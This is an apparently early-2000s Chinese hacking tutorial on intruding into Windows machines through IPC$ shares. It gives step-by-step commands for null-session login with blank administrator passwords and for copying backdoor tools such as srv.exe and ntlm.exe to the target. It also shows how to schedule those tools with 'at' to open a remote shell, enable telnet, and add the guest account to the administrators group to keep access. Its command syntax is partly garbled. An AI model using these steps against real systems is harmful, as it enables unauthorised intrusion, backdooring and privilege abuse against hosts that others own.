IPC入侵命令詳解

1)建立空連接:
net use \IPipc?$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)
2)建立非空連接:
net use \IPipc?$ "用戶名" /user:"密碼" (同樣有3個空格)
3)映射默認共享:
net use z: \IPc?$ "密碼" /user:"用戶名" (即可將對方的c盤映射爲自己的z盤，其他盤類推)
如果已經和目標建立了ipc?$，則可以直接用IP+盤符+?$訪問,具體命令 net use z: \IPc?$
4)刪除一個ipc?$連接
net use \IPipc?$ /del
5)刪除共享映射
net use c: /del 刪除映射的c盤，其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
3 查看遠程主機的共享資源（但看不到默認共享）
net view \IP
　　4 查看本地主機的共享資源（可以看到本地的默認共享）
net share
　　5 得到遠程主機的用戶名列表
nbtstat -A IP
　　6 得到本地主機的用戶列表
net user
　　7 查看遠程主機的當前時間
net time \IP
　　8 顯示本地主機當前服務
net start
　　9 啓動/關閉本地服務
net start 服務名 /y
net stop 服務名 /y
　　10 映射遠程共享:
net use z: \IPbaby
此命令將共享名爲baby的共享資源映射到z盤
　　11 刪除共享映射
net use c: /del 刪除映射的c盤，其他盤類推
net use * /del /y刪除全部
　　12 向遠程主機複製文件
copy 路徑srv.exe \IP共享目錄名，如：
copy ccbirds.exe \*.*.*.*c 即將當前目錄下的文件複製到對方c盤內
　　13 遠程添加計劃任務
at \ip 時間 程序名，如：
at \127.0.0.0 11:00 love.exe
注意：時間儘量使用24小時制；在系統默認搜索路徑（比如system32/）下不用加路徑，否則必須加全路徑
14 開啓遠程主機的telnet
這裏要用到一個小程序：opentelnet.exe，各大下載站點都有，而且還需要滿足四個要求：
　　1）目標開啓了ipc?$共享
　　2）你要擁有管理員密碼和帳號
　　3）目標開啓RemoteRegistry服務，用戶就該ntlm認證
　　4）對WIN2K/XP有效，NT未經測試
　　命令格式：OpenTelnet.exe \server account psw NTLM認證方式 port
　　試例如下：c:>OpenTelnet.exe \*.*.*.* administrator "" 1 90
　　15 激活用戶/加入管理員組
　　1 net uesr account /active:yes
　　2 net localgroup administrators account /add
　　16 關閉遠程主機的telnet
　　同樣需要一個小程序：ResumeTelnet.exe
　　命令格式：ResumeTelnet.exe \server account psw
　　試例如下：c:>ResumeTelnet.exe \*.*.*.* administrator ""
　　17 刪除一個已建立的ipc?$連接
　　net use \IPipc?$ /del
九 經典入侵模式
這個入侵模式太經典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創作者!(不知道是哪位前輩)
1. C:>net use \127.0.0.1IPC?$ "" /user:"admintitrators"
這是用《流光》掃到的用戶名是administrators，密碼爲"空"的IP地址(空口令?哇,運氣好到家了)，如果是打算攻擊的話，就可以用這樣的命令來與 127.0.0.1建立一個連接，因爲密碼爲"空"，所以第一個引號處就不用輸入，後面一個雙引號裏的是用戶名，輸入administrators，命令即可成功完成。
複製之前務必用net view \IP這個命令看一下對方的共享情況　　
2. C:>copy srv.exe \127.0.0.1admin?$
先複製srv.exe上去，在流光的Tools目錄下就有（這裏的?$是指admin用戶的c:winntsystem32，大家還可以使用c?$、d?$，意思是C盤與D盤，這看你要複製到什麼地方去了）。
　　
3. C:>net time \127.0.0.1
查查時間，發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00，命令成功完成。
　　
4. C:>at \127.0.0.1 11:05 srv.exe
用at命令啓動srv.exe吧（這裏設置的時間要比主機時間快，不然你怎麼啓動啊，呵呵！）
　　
5. C:>net time \127.0.0.1
再查查到時間沒有？如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05，那就準備開始下面的命令。
　　
6. C:>telnet 127.0.0.1 99
這裏會用到Telnet命令吧，注意端口是99。Telnet默認的是23端口，但是我們使用的是SRV在對方計算機中爲我們建立一個99端口的Shell。
雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活！所以我們打算建立一個Telnet服務！這就要用到ntlm了
　　
7.C:>copy ntlm.exe \127.0.0.1admin?$
用Copy命令把ntlm.exe上傳到主機上（ntlm.exe也是在《流光》的Tools目錄中）。
　　
8. C:WINNTsystem32>ntlm
輸入ntlm啓動（這裏的C:WINNTsystem32>指的是對方計算機，運行ntlm其實是讓這個程序在對方計算機上運行）。當出現"DONE"的時候，就說明已經啓動正常。然後使用"net start telnet"來開啓Telnet服務！
9. Telnet 127.0.0.1，接着輸入用戶名與密碼就進入對方了，操作就像在DOS上操作一樣簡單！(然後你想做什麼?想做什麼就做什麼吧,哈哈)
爲了以防萬一,我們再把guest激活加到管理組
10. C:>net user guest /active:yes
將對方的Guest用戶激活
11. C:>net user guest 1234
將Guest的密碼改爲1234,或者你要設定的密碼
12. C:>net localgroup administrators guest /add
將Guest變爲Administrator^_^(如果管理員密碼更改，guest帳號沒改變的話，下次我們可以用guest再次訪問這臺計算機)
另外,你也可以根據返回的錯誤號分析原因：
錯誤號5，拒絕訪問：很可能你使用的用戶不是管理員權限的，先提升權限；
錯誤號51，Windows無法找到網絡路徑：網絡有問題；
錯誤號53，找不到網絡路徑：ip地址錯誤；目標未開機；目標lanmanserver服務未啓動；目標有防火牆（端口過濾）；
錯誤號67，找不到網絡名：你的lanmanworkstation服務未啓動或者目標刪除了ipc?$；
錯誤號1219，提供的憑據與已存在的憑據集衝突：你已經和對方建立了一個ipc?$，請刪除再連；
錯誤號1326，未知的用戶名或錯誤密碼：原因很明顯了；
錯誤號1792，試圖登錄，但是網絡登錄服務沒有啓動：目標NetLogon服務未啓動；
錯誤號2242，此用戶的密碼已經過期：目標有帳號策略，強制定期要求更改密碼